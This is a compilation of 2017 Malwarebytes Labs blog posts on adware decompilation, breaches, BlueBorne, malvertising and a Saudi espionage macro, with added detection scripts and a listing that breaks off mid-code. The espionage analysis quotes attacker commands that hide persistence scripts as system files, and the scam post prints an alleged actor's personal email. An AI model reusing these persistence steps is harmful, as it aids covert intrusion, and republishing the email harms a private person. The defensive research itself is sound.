Oct 5, 2017

Using ILSpy to analyze a small adware file

My curiosity was triggered when the telemetry of our heuristic scanner started showing a multitude of reports about a small file called grandfather.exe, so I went out to grab a copy and have a look at it.

As you can probably tell from some of the detection names at Virustotal, this is a MSIL (Microsoft Intermediate Language) file. There are a lot of tools to decompile MSIL executables, but ILSpy is my personal favorite. To demonstrate why, I will show you how I analyzed this very small executable that is part of the Adware.Dotdo family.

Using ILSpy

Once you have downloaded and unzipped the binaries from their site, you can run ILSpy.exe and click File > Open to navigate to the file you would like to look at.

One advantage of ILSpy is that the code is shown in a very clear format. Even knowing how to read pseudocode and where to find .NET documentation will get you a long way, as I’m about to demonstrate.

The code in the example

Code is shown in C# format

In this code slice, where the most important part of the program is initialized, we see three methods of hiding the program parts from the user:

  • The program will not be shown in the taskbar
  • The opacity is set at 0% which means you will see right through it
  • And the program will not show any error prompts in case any script errors occur

By the way, if you are more comfortable with coding or reading code in VB.net, you can set ILSpy to show the code in that format.

Code is shown in VB format

The strings in the code above have been obfuscated in a very simple way. Just enough to throw someone who is merely looking at strings off track.

After applying Replace("28851129", string.Empty), which is appended to all the strings in that part of the code, this is what’s left of the two functions that will later be used as event handlers:


Private Sub ie(sender As Object, e As EventArgs)
    ' Let the hidden WebBrowser control navigate on its own
    Me.i.AllowNavigation = True
    ' followed by the navigation to the obfuscated URL
End Sub


The event handler above simply navigates to the obfuscated URL.


Private Sub i(sender As Object, e As WebBrowserDocumentCompletedEventArgs)
    ' Redirect unless the loaded page already carries the "searchbox" title
    If Me.i.Document.Title <> "searchbox" Then
        ' navigation to the obfuscated URL
    End If
End Sub


This event handler determines where the browser connects to, based on the title of the current document. If the title of the site does not match “searchbox” then it simply redirects the user to the URL that is obfuscated. If the title already is “searchbox” it will do nothing.

VB code

This is where the browser control (‘this’) is initialized while the layout of the main Window (‘base’) is postponed until the browser is ready to go. All the control’s edges are docked to the edges of its containing control and sized appropriately. The browser will resize to fit all of the empty space in its parent container with the DockStyle.Fill property set.

Then the location, size, and name are set, but also the control is hidden by setting the “.visible” property to “false”.

When the new document is fully loaded, the DocumentCompleted event occurs, and the event handler is the (lightly) obfuscated function we discussed earlier, so that will be triggered.

The AutoScaleDimensions property represents the DPI or font setting of the screen that the control was scaled to or designed for. Specifically, at design time this property will be set by the Windows Forms designer to the value your monitor is currently using. The “Font” is auto-scaled as well, relative to the dimensions of the font the classes are using, which is typically the system font.

Then after the browser control has been added to the base application, the first event handler is called which, as mentioned earlier, hides the main window and initializes the browser.
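As an added example that is not part of the original post, here is a small Python triage helper for decompiled output of this kind: it pulls the junk token out of the Replace(..., string.Empty) call, strips it from every string literal in the listing (not only the ones the call is attached to), and flags the window-hiding properties discussed above. The decompiled snippet, the example.invalid URLs and the class layout are constructed; only the 28851129 token and the property names come from the post.

```python
import re

# Constructed sample of decompiled C# output, modelled on the grandfather.exe
# listing discussed above. The junk token and property settings are from the
# post; the URLs, class name and layout are made up for this example.
SAMPLE_SOURCE = r'''
public class Form1 : Form
{
    private WebBrowser i;

    public Form1()
    {
        base.ShowInTaskbar = false;
        base.Opacity = 0.0;
        this.i = new WebBrowser();
        this.i.ScriptErrorsSuppressed = true;
        this.i.Visible = false;
        this.i.Dock = DockStyle.Fill;
    }

    private void ie(object sender, EventArgs e)
    {
        this.i.AllowNavigation = true;
        this.i.Navigate("http://exam28851129ple.invalid/sear28851129chbox".Replace("28851129", string.Empty));
    }

    private void i(object sender, WebBrowserDocumentCompletedEventArgs e)
    {
        if (this.i.Document.Title != "sea28851129rchbox".Replace("28851129", string.Empty))
        {
            this.i.Navigate("http://exam28851129ple.invalid/sear28851129chbox".Replace("28851129", string.Empty));
        }
    }
}
'''

# The three hiding tricks from the post plus the hidden browser control itself.
HIDING_INDICATORS = {
    "ShowInTaskbar = false": re.compile(r"ShowInTaskbar\s*=\s*false"),
    "Opacity = 0": re.compile(r"Opacity\s*=\s*0(?:\.0+)?\b"),
    "ScriptErrorsSuppressed = true": re.compile(r"ScriptErrorsSuppressed\s*=\s*true"),
    "Visible = false": re.compile(r"\bVisible\s*=\s*false"),
}

# A literal token removed via .Replace("<token>", string.Empty) is the obfuscation key.
REPLACE_CALL = re.compile(r'\.Replace\("([^"]+)",\s*string\.Empty\)')
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')


def find_junk_tokens(source):
    """Return the set of tokens the code strips out of its own strings."""
    return set(REPLACE_CALL.findall(source))


def recover_strings(source):
    """Strip every discovered token from every string literal in the listing."""
    tokens = find_junk_tokens(source)
    recovered = []
    for lit in STRING_LITERAL.findall(source):
        if lit in tokens:          # the token argument itself is not a payload string
            continue
        clean = lit
        for tok in tokens:
            clean = clean.replace(tok, "")
        if clean != lit and clean not in recovered:
            recovered.append(clean)
    return recovered


def hiding_indicators(source):
    """Names of the window-hiding properties present in the listing."""
    return [name for name, rx in HIDING_INDICATORS.items() if rx.search(source)]


def triage(source):
    """Summary a reviewer can act on: hiding tricks, deobfuscated strings, URLs."""
    strings = recover_strings(source)
    return {
        "hiding_indicators": hiding_indicators(source),
        "recovered_strings": strings,
        "urls": [s for s in strings if s.startswith(("http://", "https://"))],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SOURCE).items():
        print(key, value)
```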


The “program” stays completely hidden from the user, but tries to contact two different websites on the same domain, probably with the intention to fetch further instructions. At the moment of writing, the site contains two iframes connecting to videojelly[.]com and whos.amung[.]us, a visitors counter.

I tried to show why I like ILSpy as a tool to decompile .NET and browse the assembly.

The file we looked at has:

SHA-256: 53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240

Grandfather.exe is now detected as Adware.Dotdo.



Pieter Arntz

The post Using ILSpy to analyze a small adware file appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 2, 2017

National cybersecurity awareness month: simple steps for online safety

With each new devastating breach of security—Equifax, Deloitte, and Sonic, to name a few recent cyber fails—the need for increased cybersecurity awareness has never been more apparent. It’s a good thing, then, that this month is National Cybersecurity Awareness Month (NCSAM).

Observed every October since 2004, NCSAM was created by the Department of Homeland Security and the National Cyber Security Alliance to ensure that every American has the resources they need to stay safer and more secure online. According to the Department of Homeland Security, NCSAM was designed to “engage and educate public and private sector partners through events and initiatives to raise awareness about the importance of cybersecurity, provide them with tools and resources needed to stay safe online, and increase the resiliency of the nation in the event of a cyber incident.”

NCSAM is broken down into weekly themes, including online safety for consumers, securing business networks, looking ahead to the security of future technologies, careers in cybersecurity, and securing infrastructure.

And now Malwarebytes is doing its part. Each week on Labs, we’ll focus on a theme and provide helpful articles, useful tips, and valuable analysis so that you can increase awareness and spread the word. This week’s theme: simple steps to online safety.

Week 1 of NCSAM features the STOP. THINK. CONNECT. campaign, which provides easy, actionable advice for safe surfing. STOP: make sure security measures are in place. THINK: about the consequences of your actions and behaviors online. CONNECT: and enjoy the Internet.

Sounds pretty simple, right? But what exactly does it mean? Here’s our interpretation.

Make sure security measures are in place

It’s often mind-numbing to think about all the things you should and shouldn’t be doing online. Here’s where you use technology to do the heavy lifting. Make sure you’ve got the following equipped on your home computer:

  • Firewall
  • Cybersecurity program that includes technology to block malware, ransomware, adware, and other advanced threats
  • Password manager
  • Wifi secured with password (for mobile devices/streaming)

To learn more about how to proactively protect against various forms of cybercrime, take a look at a few of our articles:

How to beat ransomware: prevent, don’t react

10 easy ways to prevent malware infection

Top 10 ways to secure your mobile phone

Why you don’t need 27 different passwords

With these in place, you can keep out a good chunk of the bad stuff, even if you “misbehave” online. However, human error still accounts for a lot of infections. So that’s why the next step is important.

Think about the consequences of your actions and behaviors online

Sure, you may have layers upon layers of security in place, and that’s going to help. But if you invite a criminal into your home, you’ve pretty much negated any security system you might have deployed. And that’s what happens when you ignore basic online hygiene.

To refresh your memory, there are a few things you need to keep an eye out for/be skeptical of:

  • Tech support scams (Microsoft won’t call you)
  • Phishing emails (is this really your bank asking you to update personal info?)
  • IRS phone calls/texts/emails (they mail you letters)
  • Online shopping on unsecured sites (look for the lock next to the URL)

We could go on, of course, but this general advice is good for all actions online: Does it seem too good to be true? If so, it probably is. Always treat information you encounter with a good sense of skepticism. And for more detailed advice, you can check out these Labs articles:

Tech support scams help and resource page

Something’s phishy: How to detect phishing attempts

Hacking your head: How cybercriminals use social engineering

Connect and enjoy the Internet

If you’re securing your home computer with the proper technologies and making cybersecurity awareness a priority (and if you’ve read this far, that means you are), then you can safely connect to the Internet and enjoy all the cat videos you want to your heart’s content. Sadly, there’s no such thing as being 100 percent secure—online or in life—but you can breathe easier knowing you’re doing the right things and acting responsibly.

Now onward! Go forth, spread the word, and stay tuned for NCSAM’s Week 2 theme: cybersecurity in the workplace is everyone’s business.

Happy surfing!

The post National cybersecurity awareness month: simple steps for online safety appeared first on Malwarebytes Labs.


Oct 2, 2017

A week in security (September 25 – October 01)

Recently, we talked about the hacking incident at Deloitte, one of the ‘big four’ global accounting firms. It was reported that client email addresses, usernames, and passwords were exposed. This also brought to light weaknesses in their policies and a lack of threat intelligence to recover leaked data. We advised Deloitte clients the following: do an inventory of email addresses used to correspond with the company, review network outbound traffic, determine what information might have leaked from the hack, and (more importantly) maintain security best practices to keep hacks like this from happening again.

Patrick Wardle, an acclaimed security researcher, found a keychain vulnerability in High Sierra, Apple’s new macOS operating system. This revelation, unfortunately, spurred a lot of articles that one may deem as bordering on FUD (fear, uncertainty, doubt). So our resident Mac expert, Thomas Reed, set some records straight.

Senior Malware Analyst Nathan Collier likened BlueBorne, the new attack vector using Bluetooth technology, to influenza. First discovered by Armis Labs, BlueBorne can potentially affect billions of devices across multiple platforms. In the piece, Collier stressed the importance of Bluetooth security and agreed with Armis’s prediction that Bluetooth vulnerabilities would continue to be seen in the future.

Lastly, Lead Malware Intelligence Analyst Jérôme Segura discussed some discoveries last week about cryptocoin mining, malvertising, tech support scam, and targeted attacks.

Segura revealed a questionable trend on the rise where website publishers would mine for cryptocurrencies from user machines while on their sites. He also pictured a scenario where mining is also tied with malvertising. Scammers abused Taboola, a global discovery platform, to redirect users from a promoted story to a tech support scam page.

Segura, together with David Sánchez, wrote about an espionage attack against the Saudi Arabia government in an effort to let readers understand how the malware entered its target systems and kept in touch with its C&C.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers

  • Responsible Vulnerability Disclosure Is Becoming An International Norm. “More and more countries are joining the United States in adopting a policy of weighing the pros and cons of responsible vulnerability disclosure, as the public calls for more clarity regarding intelligence agencies and their supposed hoarding of previously undiscovered software flaws” (Source: Cyberscoop)
  • Mobile Stock Trading App Providers Unresponsive to Glaring Vulnerabilities. “Researchers from IOActive today published a report describing the scope of the security issues. More concerning, however, is the lack of response from the respective financial firms. Of the 21 apps in question, researcher Alejandro Hernandez said he sent detailed private disclosures to 13 brokerage firms and only two had acknowledged the reports as of Monday.” (Source: Threatpost)
  • XPCTRA Malware Steals Banking And Digital Wallet User’s Credentials. “The malspams used in the campaign try to induce the victim to open a supposed bank bill link. It actually leads to the download of the XPCTRA dropper, that is, the part of the malware responsible for environment recognition and downloading new components. Once executed, it initiates a connection with an Internet address to download other malware parts responsible for later malicious actions.” (Source: SANS Internet Storm Center)
  • Android Unlock Patterns Are A Boon For Shoulder Surfing Attackers. “The ‘swiping’ unlock patterns typical for Android devices are considerably easier for attackers to discern than PIN combinations. In fact, after only one observation of a user entering the pattern, 64% of shoulder surfing attackers will be able to reproduce it, a group of researchers from the US Naval Academy and the University of Maryland Baltimore County has found.” (Source: Help Net Security)
  • Police: Buying Fake Goods Online Can Lead to ID Theft. “The City of London Police has shut down 28,000 websites selling counterfeit goods over the past three years, many of which were registered with stolen identities, it has revealed. Over 4000 sites were created using the identities of unsuspecting members of the public, according to the force, which released the figures as part of a new awareness campaign.” (Source: Infosecurity Magazine)
  • No, Facebook Spies Aren’t Secretly ‘Following Me’, It’s A Hoax. “According to the nonsense debunkers over at Snopes, the hoax debuted in January 2017.” (Source: Sophos’s Naked Security Blog)
  • Sudden Rise Detected in Faceliker Malware That Manipulates Facebook ‘Likes’. “The Faceliker malware is not new, being spotted years back, and is a generic detection that describes malware that takes over users’ browsers and uses JavaScript code to perform click-jacking, giving Facebook “likes” to content received from a central command and control server.” (Source: Bleeping Computer)
  • Duo Security Discovers Apple Mac Computers Unprotected from Malicious Firmware Vulnerabilities. “The report shows Mac users who have updated to the latest operating system (OS) or downloaded the most recent security update may not be as secure as they originally thought. A Duo Labs analysis of over 73,000 real-world Mac systems gathered from users across industries found the Extensible Firmware Interface (EFI) in many popular Mac models was not actually receiving the security updates users thought. This left users susceptible to previously disclosed vulnerabilities such as Thunderstrike 2 and the recent WikiLeaks Vault 7 data dumps that detail attacks against firmware.” (Source: Duo Security)
  • Uber London Ban Sees Rise In Malicious Taxi Apps. “Security researchers have warned of a rise in malicious apps masquerading as legitimate taxi-hailing services, as cyber-criminals look to capitalize on Transport for London (TfL)’s recent decision to ban Uber.” (Source: Infosecurity Magazine)

Latest updates for Businesses

  • Criminal Hacking: Top Technology Risk To Health, Safety And Prosperity. “Americans believe criminal hacking into computer systems is now a top risk to their health, safety and prosperity. Criminal hacking, a new ESET survey finds, outranks other significant hazards, including climate change, nuclear power, hazardous waste, and government surveillance.” (Source: Help Net Security)
  • Three Out Of Four DDoS Attacks Target Multiple Vectors. “Three out of every four DDoS attacks employed blended, multi-vector approaches in the second quarter of 2017, according to Nexusguard. The quarterly report, which measured more than 8,300 attacks, demonstrated that hackers continued to rely on volumetric attacks to overwhelm system resources.” (Source: Help Net Security)
  • Why Your Business Must Care About Privacy. “The current conversation often pits privacy against security, both in consumer and enterprise settings. This is especially true in the debate over whether mobile encryption is essential for the average user. However, not wanting to have personal information shared, acted on, or used by anyone without permission should be seen as a universal right.” (Source: Dark Reading)
  • Shocker? Companies Still Unprepared To Deal With Ransomware. “Companies and government agencies are overwhelmed by frequent, severe ransomware attacks, which have now become the #1 cyber threat to organizations, according to Crowd Research Partners.” (Source: Help Net Security)
  • Healthcare Sector Reports Greatest Number Of Security Incidents. “McAfee Labs saw healthcare surpass public sector to report the greatest number of security incidents in Q2, while the Faceliker Trojan helped drive quarter’s 67% increase in new malware samples from the social media landscape.” (Source: Help Net Security)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (September 25 – October 01) appeared first on Malwarebytes Labs.


Oct 1, 2017

IP Expo 2017: Garry Kasparov to address delegates on the future of man-machine interaction

Keynote Speech: 15:40 – 16:10 BST
Location: IP Expo Europe, Main Keynote Stage


Oct 1, 2017

Reviving the Rational Middle

In my previous blog posts, I have often argued that the internet brings latent conflicts to the fore, whether we are discussing fake news, government surveillance, nation-state cybersecurity or hate speech. Now, I’d like to make the case that it also works the other way, as we witness the opposite happen such as in Charlottesville, where white supremacist groups marched with lit torches. Tensions that have long been simmering online have now moved into the realm of face-to-face interaction, where they have exploded with fresh force. Difficult chapters of America’s history have resurfaced; viewpoints we would like to think have been eradicated are still very much alive. The episodes in Charlottesville were painful to watch, absolutely, but perhaps it is better to have these elements of society exposed. If they remain outside of the public’s awareness, we can continue to collectively deny their existence. If they are brought to the surface, we must confront them and react, hopefully in a way that aligns with our guiding principles.


Oct 1, 2017

Securing the Total Network: Data, Devices, and People

If you’re in the business of securing networks for small and medium-sized businesses (SMBs), there is a volume of new challenges you’re most likely tackling. Cybercrime such as ransomware is more pervasive than ever before, with employee error contributing to the risks. The growing amount of connected devices in the workplace has only added to the number of endpoints that need to be managed, and this is made all the more challenging by an industry shortage of cyberskills.


Sep 29, 2017

BlueBorne – Bluetooth’s airborne influenza

Armis Labs has discovered a new attack vector that targets any device that has Bluetooth capability. This includes mobile, desktop, and IoT — roughly accounting for 8.2 billion devices. All operating systems are susceptible — Android, iOS, Windows, and Linux. Dubbed BlueBorne, it exposes several vulnerabilities in the Bluetooth technology. These vulnerabilities open up the potential to perform an array of malicious attacks. Some of which, stated by Armis, are as follows:

  • Take control of devices
  • Access corporate data and networks
  • Break into secure networks that use air gap security measures
  • Spreading malware to other Bluetooth devices within range of the infected device

BlueBorne does not require Bluetooth devices to be paired to other devices to be exploited. Even worse, devices are susceptible even when Bluetooth is in non-discoverable mode.

The ease of exploitation

What exactly does it take to exploit these new-found Bluetooth vulnerabilities? As noted in the Armis Labs BlueBorne whitepaper, the first step is to steal the BD_ADDR (Bluetooth Device address). This is a hardcoded 48-bit MAC address of the Bluetooth device. Stealing the BD_ADDR of a Bluetooth device, especially when it is set to non-discoverable, used to be considered a feat. With the introduction of new Bluetooth “sniffing” hardware, this has become a lot easier. One such device is the open source hardware Ubertooth, which plugs into a USB port of a computer. Simply be within range with the Ubertooth plugged in, and it will grab any Bluetooth traffic from the air. With the help of some other monitoring tools to analyze the traffic — voilà — you have BD_ADDRs.

Spreading malware via Bluetooth

One of the more intriguing attacks is the potential to propagate malware using BlueBorne vulnerabilities. More specifically, through mobile devices.

The only way I could hypothesize this happening is through an attack using a list of collected BD_ADDRs and then creating a malicious app which scans for those addresses. Any device within range on the list becomes a target. Using the BlueBorne vulnerabilities to propagate itself, the malicious app transfers to the target device. Keep in mind the user of the target device would need to accept installing the malicious app as well.

All this isn’t impossible, but unlikely with the limitation of requiring a list of BD_ADDRs. Now if a mobile device could steal BD_ADDRs for itself — which it can’t at this point — then we should start worrying.

So how bad is it?

The work done by Armis Labs to present the BlueBorne vulnerabilities is extremely valuable to the security industry. It highlights the need for improved Bluetooth security. I applaud them for their hard work in this endeavor.

The introduction of sniffing hardware like Ubertooth and the creation of other open-source tools to analyze the collected traffic like Kismet have taken down the toughest barrier for hackers — collecting the BD_ADDR. With this exposure, I agree with Armis Labs’ prediction — we will continue to see more Bluetooth vulnerabilities arise.

The requirement of having to be within Bluetooth range creates a limitation to BlueBorne. I believe this limitation will isolate it to more targeted attacks — most likely against specific companies. In that scenario, a spear phishing attack would be much easier to carry out and wouldn’t require being physically within Bluetooth range. Therefore, I’m skeptical that we will see BlueBorne implemented in a real-world attack.

Disabling Bluetooth

Bluetooth, by default, is enabled. If you don’t use Bluetooth, i.e. you don’t have any devices paired, it’s best to disable it. If you do use your Bluetooth, disabling it when not in use is the most secure option against BlueBorne. However, many use their mobile devices to pair with their vehicle’s handsfree unit. Ideally, remembering to enable/disable Bluetooth depending on whether you’re driving or not is the best option. Not as ideal and more likely, you will forget to enable Bluetooth before starting to drive — myself included. Therefore, you have to weigh what is more of a threat: a BlueBorne attack, or looking at your phone to enable Bluetooth WHILE driving? Just something to think about.

The post BlueBorne – Bluetooth’s airborne influenza appeared first on Malwarebytes Labs.


Sep 28, 2017

Deloitte breached by hackers for months

On September 25, 2017, Deloitte announced that they detected a breach of the firm’s global email server via a poorly secured admin email in March of this year. Further, the attackers most likely had control of the server since November of 2016. Deloitte’s initial statement indicated that only six of their consultancy clients were impacted by the breach, but insider sources later disclosed to the media that the attack most likely compromised every admin account at the firm. The startling severity of the breach has brought attention to Deloitte’s other cybersecurity practices, which, as we can see here with a likely Active Directory server, are not ideal. (There are valid applications for self-signed certificates, but the larger problem here is that the server is exposed to the outside internet at all, running unnecessary services.)

An admin account subversion is not very shocking, given that a significant number of Deloitte email accounts can be found on paste sites, most with passwords of low complexity, suggesting the firm has minimal password policies and lacks a threat intelligence capacity to identify and recover leaked PII. A quick scan of pastebin.com showed a significant amount of Deloitte data from various locations, going back five years. A portion of those pastes were email credentials – the primary breach vector – as shown below.

What you should do if you’re a Deloitte cybersecurity client

  • First and foremost, take a quick inventory of your own corporate email accounts that have corresponded with the company. Accounts with normal network privileges could benefit from a password reset. Those with elevated privileges should be reviewed for accesses and unusual activity. It’s not unheard of for attackers to breach an ancillary services firm in furtherance of an attack on the main target.
  • Do Deloitte consultants have accounts on your network? You can review outbound traffic on these hosts to make sure it matches with their work role.
  • Maintain your own threat intelligence capacity to identify work product that might be leaked on paste sites. Enormous breaches like this one are quickly monetized on the dark web, with data eventually filtering out for public use. You can’t prevent third party access to your data, but you can find it in a timely manner, and serve a takedown request accordingly.
  • Don’t repeat their mistakes. Best practices for enterprise security are widely written about and publicly available. While security is generally seen as a cost center, it would be more accurate to describe it as an investment in public trust. And without trust, how profitable could your enterprise possibly be?


Third-party breaches are occurring at an accelerating rate. While outsourcing data security to a popular vendor checks off the “security box,” there is no good substitution for in-house expertise that knows the business as well as security. Good security now is an investment in stable capital growth later. Building in-house talent to facilitate that growth can put you ahead of the curve before the next breach happens.

The post Deloitte breached by hackers for months appeared first on Malwarebytes Labs.


Sep 28, 2017

Tech support scammers abuse native ad and content provider Taboola to serve malvertising

A large number of publishers – big and small – are monetizing their sites by selling space for companies that provide so-called native advertising, cited as more effective and engaging than traditional banner ads.

Indeed, on a news or entertainment site, users are more inclined to click on links and articles thinking that they are one and the same, not realizing that those are actually ‘sponsored’ and tied to various third-party providers.

Rogue advertisers have realized this unique opportunity to redirect genuine traffic towards their own infrastructure where they can subject their audience to whatever content they wish.

Case in point, we caught this malvertising incident on MSN.com, the Microsoft web portal that attracts millions of unique visitors. While clicking on a story promoted by Taboola – a leading global discovery platform with which Microsoft signed a deal in 2016 – we were redirected to a tech support scam page. The warning claims that our computer has crashed and that we must call a number for immediate assistance.

Figure 1: Automatic redirection from click on promoted story to scam page

The fraudulent page cannot be closed normally because it uses code that repeats the warning indefinitely. Unfortunately, this is enough to scare many folks and trick them into calling what they think is Microsoft support. Instead, they will be dealing with fake technicians whose goal is to extort hundreds of dollars from them.

Decoy news page hides real intentions

Rogue actors typically start creating content just like any other advertiser would and build up a profile. After all, they want to appear genuine in order to game the system with ‘hot’ content.

What’s determined as hot can be derived from real or shocking news. The point is to do a little bit of market study on what the most searched for stories or keywords are in order to attract traffic.

In this malvertising example, if we review the sequence of events, we realize that the scammer created a bogus news site (infinitymedia[.]online) which does have actual content but is performing conditional redirects, also known as ‘cloaking’.

Figure 2: Traffic view showing temporary hop via decoy news site

A conditional redirect is usually a server-side mechanism that profiles the user and returns a particular response. For instance, if the server determines that a bot or crawler is making a request, it may in turn either deny it or simply serve the expected content (decoy). Similarly, if the user is running Internet Explorer, is from North America and their IP address appears to have hit the server for the first time, they may receive a scammy page instead.

The point is that it’s trivial to play a Dr. Jekyll and Mr. Hyde kind of game and serve the content you want. The fraudulent advertiser did create various pages with impactful keywords (potentially for Search Engine Optimization purposes) and can also use those stories as a decoy:

Figure 3: Stories designed for click-bait

To get back to this malvertising incident on MSN, the user was conditionally redirected to another site (the tech support scam page), and never saw the content they were looking for.

Figure 4: The 302 redirect call from the fake news site to the scam page

To show that this was no mere ‘coincidence’, we can look at the ownership of the ‘news’ site (infinitymedia[.]online) and see how it links to the tech support domain name (4vxadfcjdgbcmn[.]ga). A WHOIS lookup for infinitymedia[.]online returns the following information:

Creation Date: 2017-05-23T05:14:50.0Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrant Name: bhanu
Registrant Country: IN
Registrant Email: bhanutomar90nk@gmail.com

A cursory review using RiskIQ’s PassiveTotal of recently created domains using the same email address shows a tendency for this actor to register tech support scams domains:

Figure 5: Domains recently registered by the actor behind the decoys news sites

Still, we don’t have a clear connection to 4vxadfcjdgbcmn[.]ga which does not have an identifiable registrant. Indeed, the .GA Top Level Domain (TLD) is comprised of free domain names and their registrant is… Gabon TLD B.V.

However, this particular actor made the mistake of reusing the same host server for domains he had created before. For example, if we take micro-soft-system-alert2[.]online which is registered to his email address, we notice that it resolves to, a server full of tech support scams and phishing sites, including the one used in this particular malvertising attack, namely 4vxadfcjdgbcmn[.]ga.

Figure 7: Connecting the fake news sites to the tech support domain
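The two pivots above (shared registrant e-mail, then shared hosting) are a graph search over indicators. The script below is an added example, not from the original post, and generalizes the pivot to any chain of shared attributes: the WHOIS and passive DNS records are constructed from the post’s narrative, the server’s IP address is not given on the page, so 192.0.2.10 (RFC 5737 documentation space) stands in for it, and 192.0.2.20 is a constructed unrelated address.

```python
"""Pivoting from a registrant e-mail and shared hosting to link two domains.

Added example, not from the original post. The records are constructed from
the post's narrative; 192.0.2.10 is a placeholder for the shared server's IP,
which the page does not give, and 192.0.2.20 is a constructed unrelated IP.
"""
from collections import deque
from typing import Dict, List, Optional, Set

# domain -> registrant e-mail (None = no identifiable registrant, e.g. a free .GA name)
WHOIS: Dict[str, Optional[str]] = {
    "infinitymedia[.]online": "bhanutomar90nk@gmail.com",
    "micro-soft-system-alert2[.]online": "bhanutomar90nk@gmail.com",
    "4vxadfcjdgbcmn[.]ga": None,
}

# domain -> IPs it has resolved to (constructed; 192.0.2.10 is the placeholder)
PASSIVE_DNS: Dict[str, Set[str]] = {
    "infinitymedia[.]online": {"192.0.2.20"},
    "micro-soft-system-alert2[.]online": {"192.0.2.10"},
    "4vxadfcjdgbcmn[.]ga": {"192.0.2.10"},
}


def build_graph(whois: Dict[str, Optional[str]], pdns: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """Undirected graph joining each domain to the attributes it shares:
    'email:<addr>' nodes from WHOIS and 'ip:<addr>' nodes from passive DNS."""
    graph: Dict[str, Set[str]] = {}

    def link(a: str, b: str) -> None:
        graph.setdefault(a, set()).add(b)
        graph.setdefault(b, set()).add(a)

    for domain, email in whois.items():
        if email:
            link(domain, "email:" + email)
    for domain, ips in pdns.items():
        for ip in ips:
            link(domain, "ip:" + ip)
    return graph


def pivot_path(graph: Dict[str, Set[str]], src: str, dst: str) -> List[str]:
    """Shortest chain of shared attributes from src to dst (BFS); [] if unconnected."""
    prev: Dict[str, Optional[str]] = {src: None}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path: List[str] = []
            cur: Optional[str] = node
            while cur is not None:
                path.append(cur)
                cur = prev[cur]
            return path[::-1]
        for nxt in graph.get(node, ()):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return []


def attribute_fanout(graph: Dict[str, Set[str]]) -> Dict[str, int]:
    """How many domains each attribute node touches. A hub (shared hosting or a
    CDN address, a privacy-proxy e-mail) is a weak pivot; a small count is strong."""
    return {n: len(peers) for n, peers in graph.items() if n.startswith(("email:", "ip:"))}


if __name__ == "__main__":
    g = build_graph(WHOIS, PASSIVE_DNS)
    print(" -> ".join(pivot_path(g, "infinitymedia[.]online", "4vxadfcjdgbcmn[.]ga")))
    print(attribute_fanout(g))
```

The fan-out check is the caveat that goes with every hosting pivot: an IP that fronts thousands of unrelated domains proves nothing, whereas an address shared by a handful of scam sites registered to the same mailbox is the kind of link the post relies on.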

Further inspection of other properties tied to bhanutomar90nk@gmail.com shows similar bogus ‘news’ sites:


There is no doubt that this actor has very clear intentions and has turned high-profile stories into a click-bait lead generation tool for tech support scams.

Banner ads versus native advertising

Banner ads can load third-party tags that are laced with malicious content, not to mention promoting anything that is outrageous (regardless of whether it has anything to do with the current content) and is bound to get clicks. For instance, there have been many documented instances of fake celebrity deaths used for click bait purposes on Facebook.

But promoted stories aren’t necessarily that different (or safer) when they take the user to a third-party website that is in the complete control of an advertiser, good or bad.

Users should be aware that even on a trusted platform, they should watch what they click on and be careful of sensationalist stories that may be used as click bait.

We reported the fraudulent advertiser to Taboola, which told us they had opened an internal review of this particular vendor. We followed up with more questions regarding how Taboola deals with click bait and fake news, whether they scan articles for malware or scams, and finally whether they had a direct point of contact to report security-related issues. However, we only received a response on the fake news problem, which you can read more about here.

The post Tech support scammers abuse native ad and content provider Taboola to serve malvertising appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 28, 2017

Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

This post was co-authored by David Sánchez and Jérôme Segura

We recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.

In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.

This new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.

The malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell. In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.

Covert delivery and persistence

The decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content” stating that the document is in protected view (which is actually true).

A high-level static analysis summary of this document reveals that it includes a macro as well as several Base64 encoded strings.

OLE:MAS--B-- target.doc
(Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)

One of the first routines the malicious VBScript performs is to disable or lower security settings within Microsoft Excel and Word by altering corresponding registry keys with values of “1”, meaning: Enable All (ref).

The VBScript also fingerprints the victim for their IP address by querying the Win32_NetworkAdapterConfiguration class:

It then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:

The data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.

This VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:

attrib +s +h "C:\Users\public\documents\NTSTATS.ps1"
attrib +s +h "C:\Users\public\documents\NTSTATS.vbs"
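Each of the three host-side steps described so far (Office macro security set to "Enable All", a Run key plus a scheduled task, and hidden system script files under Public Documents) leaves an artifact a triage script can check. The following is an added example, not code from the original post: the registry, Run-key, task and file snapshots are constructed, the Run-key value name and the task name are assumptions (the post does not give them), and only the two file paths and the registry value "1" come from the post. It uses the Office VBAWarnings value, where 1 means all macros are enabled.

```python
"""Host triage for the tampering the post describes: Office macro security
lowered to Enable All, and script persistence via a Run key, a scheduled task
and hidden+system .vbs/.ps1 files under Public Documents.

Added example, not from the original post. Snapshots are constructed; the
Run-key value name and task name are assumptions. Paths are from the post.
"""
import re
from typing import Dict, Iterable, List, Set, Tuple

VBA_WARNINGS_ENABLE_ALL = 1   # Office VBAWarnings value meaning "Enable all macros"
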